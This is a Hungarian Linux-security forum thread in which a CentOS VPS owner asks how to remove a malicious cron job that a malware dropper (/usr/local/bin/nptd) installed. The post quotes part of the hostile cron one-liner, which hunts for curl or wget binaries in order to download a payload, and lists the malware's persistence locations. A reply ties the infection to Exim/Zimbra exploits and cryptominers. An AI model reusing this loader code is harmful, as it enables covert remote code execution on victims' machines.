cron hack

Linux-security

Üdv!
Egy up-to-date 6.* centos-ra (vps) felment egy "cron hack"(?).
A /etc/cron.d-ben egy:
*/17 * * * * root tbin=$(command -v passwd); bpath=$(dirname "${tbin}"); curl="curl"; if [ $(curl --version 2>/dev/null|grep "curl "|wc -l) -eq 0 ]; then curl="echo"; if [ "${bpath}" != "" ]; then for f in ${bpath}*; do strings $f 2>/dev/null|grep -q "CURLOPT_VERBOSE" && curl="$f" && break; done; fi; fi; wget="wget"; if [ $(wget --version 2>/dev/null|grep "wgetrc "|wc -l) -eq 0 ]; then wget="echo"; if [ "${bpath}" != "" ]; then for f in ${bpath}*; do strings $f 2>/dev/null|grep -q "to " && wget="$f" ...

A crond service-t leállítom, de nem tudom root-ként kitörölni (művelet nem megengedett).
A cron.d-t átneveztem és egy üres cron.d-vel sem enged reboot után.

A /usr/local/bin/nptd hozta létre és azt sem tudom törölni.

Futó folyamatok között semmit se látok:
https://pastebin.com/d4Qk6R1z

Mivel tudnám törölni? A rkhunter nem látott semmit.

  • 1700 megtekintés

Lehet... egyelőre lekaptam a webmin-t.

Ezt csinálta:
* /etc/crontab-ba beírta a $SUBJ-ben levő scriptet (persze hosszab volt).
* a root cron-jába is betette
* cron.d-be is beírta
* cron daily-be is beírta
* cron hourly-ba is beírta
* /usr/local/bin/nptd fájlt hozta létre
* és a /root/.cache alá dolgozott

( Huncraft v | 2019. 08. 19., h – 14:16 )

Ez nem új dolog.. Május óta látni hasonló eseteket:
https://forums.zimbra.org/viewtopic.php?t=65932&start=120
https://stackoverflow.com/questions/56563418/what-does-this-entry-in-my…

Alapvetően exim / zimbra vuln-el volt kapcsolatos, de mással is simán bejöhetett.. Nem tudom nálad melyik variáns található, de eredetileg crypto miner-eket telepítettek így az áldozat gépére. Ha fel tudnád rakni a teljes crontab entry-t (mondjuk pastebin-re) az lehet sokat segítene
____________________________________
Az embert 2 éven át arra tanítják hogyan álljon meg a 2 lábán, és hogyan beszéljen... Aztán azt mondják neki: -"Ülj le és kuss legyen!"..